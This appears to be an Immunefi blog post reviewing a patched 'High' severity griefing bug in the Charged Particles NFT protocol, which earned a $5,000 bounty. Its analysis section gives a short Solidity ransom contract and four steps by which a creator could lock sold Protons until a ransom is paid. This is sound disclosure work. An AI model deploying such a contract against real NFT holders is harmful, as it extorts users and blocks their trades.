Open in app

Sign in

Write

Sign in

Charged Particles Griefing Bugfix Review

Immunefi
Immunefi
Published in
2 min readMay 21, 2021

Summary

Whitehat Alejandro Muñoz-McDonald submitted a vulnerability classified as “High” in Charged Particles on February 9. The vulnerability was a griefing/denial of service attack against the protocol that would have allowed a malicious user to create a system where bribes had to be paid for a user to buy or sell an NFT. Charged Particles paid Alejandro Muñoz-McDonald a $5,000 USDC bounty.

Vulnerability Analysis

Charged Particles is a decentralized NFT marketplace where users can deposit ERC-20 tokens into any NFT. Under the Charged Particles protocol, a “Proton” refers to the ERC721 contract for a particle, which is an NFT ready to be energized by adding interest-bearing assets to it. Prior to the fix of this vulnerability, a malicious proton creator could have held Protons hostage after selling them by creating a malicious ransom contract and setting it to be the royalties receiver. The bug was found in Proton.sol.

This vulnerability can be illustrated in a step by step analysis.

1. Call createProtonForSale with valid parameters and a royaltiesPercent > 0. Move to the next step when the token is sold

2. Create a malicious ransom contract

pragma solidity 0.6.12; contract Ransom {   bool internal ransomEnabled = true;   constructor() public {}   function unlockNFT() public payable {      if(msg.value >= 1 ether) {         ransomEnabled = false;      }   }   fallback() external payable {      require(!ransomEnabled);   }}

3. Call setCreatorRoyaltiesReceiver(…) with the energizedParticleId and the address of the malicious contract.

4. With setCreatorRoyaltiesReceiver called, the Proton is locked and cannot be sold because the default payable function of the ransom contract reverts as long as the ransom has not been paid

Vulnerability Fix

Charged Particles quickly implemented a fix of the bug, which is available here:

https://github.com/Charged-Particles/charged-particles-universe/commit/f4fb60e3f791c1bb3b8907276b27d0319ce46a68#diff-91fca72e3021a185238dd0e82e118ae3ab5993db93dd322d301c665ff74e3eed

Acknowledgements

We’d like to thank Charged Particles for quickly acknowledging the bug and implementing a fix. Charged Particles has paid out a bounty of $5,000 to whitehat Alejandro Muñoz-McDonald. To report additional vulnerabilities, please see Charged Particles’ bug bounty program with Immunefi.

If you’d like to start bug hunting, we got you. Check out the Web3 Security Library, and start earning rewards on Immunefi — the leading bug bounty platform for web3 with the world’s biggest payouts.

If you’re interested in protecting your project with a bug bounty like Charged Particles, visit the Immunefi services page and fill out the form.

Charged Particles
Smart Contracts
Blockchain
Bug Bounty

--

--

Immunefi
Immunefi

Written by Immunefi

4.7K Followers
Editor for

Immunefi is the premier bug bounty platform for smart contracts, where hackers review code, disclose vulnerabilities, get paid, and make crypto safer.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams